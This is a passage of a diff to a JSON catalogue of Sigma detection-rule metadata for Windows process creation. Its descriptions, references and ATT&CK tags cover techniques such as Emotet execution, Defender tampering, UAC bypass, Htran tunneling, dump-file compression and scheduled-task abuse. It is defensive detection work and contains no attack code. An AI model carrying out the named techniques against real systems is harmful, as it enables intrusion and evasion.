"15b75071-74cc-47e0-b4c6-b43744a62a2b", - "value": "Suspicious Process Start Locations" - }, - { - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\\Program Files')", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_rurat_exec_location.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "e01fa958-6893-41d4-ae03-182477c5e77d", - "value": "Execution of Remote Utilities RAT (RURAT) From Unusual Location" - }, - { - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_schtasks_change.yml", + "filename": "proc_creation_win_susp_winrar_dmp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml" + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml" ], "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.collection", + "attack.t1560.001" ] }, - "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "value": "Suspicious Modification Of Scheduled Tasks" + "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "value": "Winrar Compressing Dump Files" }, { - "description": "Detects when adversaries stop services or processes by deleting their respective schdueled tasks in order to conduct data destructive activities", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", + "author": "Florian Roth", + "creation_date": "2019/09/30", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_susp_schtasks_delete.yml", + "filename": "proc_creation_win_malware_emotet.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ] - }, - "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", - "value": "Delete Important Scheduled Task" - }, - { - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_schtasks_delete_all.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ] - }, - "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "value": "Delete All Scheduled Tasks" - }, - { - "description": "Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_schtasks_disable.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ] - }, - "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "value": "Disable Important Scheduled Task" - }, - { - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/21", - "falsepositive": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" - ], - "filename": "proc_creation_win_susp_schtasks_env_folder.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", - "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" + "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", + "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", + "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", + "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" ], "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ] }, - "uuid": "81325ce1-be01-4250-944f-b4789644556f", - "value": "Suspicious Schtasks From Env Var Folder" + "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "value": "Emotet Process Creation" }, { - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_schtasks_folder_combos.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "value": "Schtasks From Suspicious Folders" - }, - { - "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/23", - "falsepositive": [ - "Software installers that run from temporary folders and also install scheduled tasks" - ], - "filename": "proc_creation_win_susp_schtasks_parent.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "9494479d-d994-40bf-a8b1-eea890237021", - "value": "Suspicious Add Scheduled Task Parent" - }, - { - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/23", - "falsepositive": [ - "Software installers that run from temporary folders and also install scheduled tasks" - ], - "filename": "proc_creation_win_susp_schtasks_pattern.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", - "value": "Suspicious Add Scheduled Command Pattern" - }, - { - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", - "falsepositive": [ - "Legitmate processes that run at logon. Filter according to your environment" - ], - "filename": "proc_creation_win_susp_schtasks_schedule_type.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", - "value": "Suspicious Schtasks Schedule Types" - }, - { - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/31", - "falsepositive": [ - "Some installers were seen using this method of creation unfortunately. Filter them in your environment" - ], - "filename": "proc_creation_win_susp_schtasks_schedule_type_system.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", - "value": "Suspicious Schtasks Schedule Type With High Privileges" - }, - { - "description": "schtasks.exe create task from user AppData\\Local\\Temp", - "meta": { - "author": "frack113", - "creation_date": "2021/11/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_schtasks_user_temp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_user_temp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", - "value": "Suspicious Add Scheduled Task From User AppData Temp" - }, - { - "description": "Detects the creation of scheduled tasks in user session", - "meta": { - "author": "Florian Roth", + "author": "Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali", "creation_date": "2019/01/16", "falsepositive": [ - "Administrative activity", - "Software installation" + "Inventory tool runs", + "Administrative activity" ], - "filename": "proc_creation_win_susp_schtask_creation.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.005", - "attack.s0111", - "car.2013-08-001" - ] - }, - "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", - "value": "Scheduled Task Creation" - }, - { - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/03/11", - "falsepositive": [ - "Administrative activity", - "Software installation" - ], - "filename": "proc_creation_win_susp_schtask_creation_temp_folder.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", - "value": "Suspicious Scheduled Task Creation Involving Temp Folder" - }, - { - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/11", - "falsepositive": [ - "Legitimate use by administrative staff" - ], - "filename": "proc_creation_win_susp_screenconnect_access.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ] - }, - "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", - "value": "ScreenConnect Remote Access" - }, - { - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "meta": { - "author": "frack113", - "creation_date": "2021/08/19", - "falsepositive": [ - "GPO" - ], - "filename": "proc_creation_win_susp_screensaver_reg.yml", + "filename": "proc_creation_win_net_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", - "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" - ] - }, - "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", - "value": "Suspicious ScreenSave Change by Reg.exe" - }, - { - "description": "Detects suspicious file execution by wscript and cscript", - "meta": { - "author": "Michael Haag", - "creation_date": "2019/01/16", - "falsepositive": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." - ], - "filename": "proc_creation_win_susp_script_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ] - }, - "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", - "value": "WSF/JSE/JS/VBA/VBE File Execution" - }, - { - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", - "value": "Script Interpreter Execution From Suspicious Folder" - }, - { - "description": "Detects a suspicious script executions from temporary folder", - "meta": { - "author": "Florian Roth, Max Altgelt, Tim Shelton", - "creation_date": "2021/07/14", - "falsepositive": [ - "Administrative scripts" - ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", - "value": "Suspicious Script Execution From Temp Folder" - }, - { - "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", - "meta": { - "author": "Janantha Marasinghe", - "creation_date": "2022/11/18", - "falsepositive": [ - "Legitimate administrative use" - ], - "filename": "proc_creation_win_susp_secedit.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml" ], "tags": [ "attack.discovery", - "attack.persistence", - "attack.defense_evasion", - "attack.credential_access", - "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" + "attack.t1087.001", + "attack.t1087.002" ] }, - "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", - "value": "Potential Suspicious Activity Using SeCEdit" + "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "value": "Suspicious Reconnaissance Activity Using Net" }, { - "description": "Detects suspicious DACL modifications that can be used to hide services or make them unstopable", + "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { - "author": "Jonhnathan Ribeiro, oscd.community", - "creation_date": "2020/10/16", + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_service_dacl_modification.yml", + "filename": "proc_creation_win_invoke_obfuscation_stdin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_stdin.yml" ], "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ] }, - "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "value": "Suspicious Service DACL Modification" + "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher" }, { - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/18", + "creation_date": "2022/08/05", "falsepositive": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "filename": "proc_creation_win_susp_service_dacl_modification_set_service.yml", + "filename": "proc_creation_win_tamper_defender_remove_mppreference.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.003" - ] - }, - "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", - "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet" - }, - { - "description": "Detects a service binary running in a suspicious directory", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/03/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_service_dir.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", - "value": "Suspicious Service Binary Directory" - }, - { - "description": "Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\nAdversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\n", - "meta": { - "author": "frack113", - "creation_date": "2021/07/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_service_modification.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml" ], "tags": [ "attack.defense_evasion", "attack.t1562.001" ] }, - "uuid": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b", - "value": "Stop Or Remove Antivirus Service" + "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "value": "Tamper Windows Defender Remove-MpPreference" }, { - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "description": "Detects WMI spawning a PowerShell process", "meta": { - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (update)", - "creation_date": "2019/10/21", + "author": "Markus Neis / @Karneades", + "creation_date": "2019/04/03", "falsepositive": [ - "Unlikely" + "AppvClient", + "CCM" ], - "filename": "proc_creation_win_susp_service_path_modification.yml", + "filename": "proc_creation_win_wmi_spwns_powershell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml" + "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_spwns_powershell.yml" ], "tags": [ - "attack.persistence", + "attack.execution", + "attack.t1047", + "attack.t1059.001" + ] + }, + "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "value": "WMI Spawning Windows PowerShell" + }, + { + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "meta": { + "author": "FPT.EagleEye, Nasreddine Bencherchali", + "creation_date": "2021/03/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_snapins_hafnium.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.intrinsec.com/apt27-analysis/", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "25676e10-2121-446e-80a4-71ff8506af47", + "value": "Exchange PowerShell Snap-Ins Usage" + }, + { + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_dismhost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" + ], + "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1548.002" ] }, - "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", - "value": "Suspicious Service Path Modification" + "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "value": "UAC Bypass Using DismHost" }, { - "description": "Detects the usage of one of the the commands to stop services such as 'net', 'sc'...etc in order to stop critical or important windows services such as AV, Backup...etc. As seen being used in some ransomware scripts", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/01", + "author": "Florian Roth", + "creation_date": "2022/12/27", "falsepositive": [ - "Administrator or tools shutting down the services due to upgrade or removal purposes. If you experience some FP please consider adding filters to the parent process launching this command and not removing the entry" + "Unknown" ], - "filename": "proc_creation_win_susp_service_stop.yml", + "filename": "proc_creation_win_hack_htran.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", - "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" + "https://github.com/cw1997/NATBypass", + "https://github.com/HiwinCN/HTran", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_htran.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1489" + "attack.command_and_control", + "attack.t1090", + "attack.s0040" ] }, - "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "value": "Suspicious Stop Windows Service" + "uuid": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "value": "Htran or NATBypass Markers" }, { - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" - ] - }, - "uuid": "75578840-9526-4b2a-9462-af469a45e767", - "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322" - }, - { - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/14", - "falsepositive": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" - ], - "filename": "proc_creation_win_susp_servu_process_pattern.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" - ] - }, - "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "value": "Suspicious Serv-U Process Pattern" - }, - { - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "description": "Detects the rare use of the command line tool shutdown to logoff a user", "meta": { "author": "frack113", - "creation_date": "2021/12/10", + "creation_date": "2022/10/01", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_sharpview.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/tevora-threat/SharpView/", - "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" - 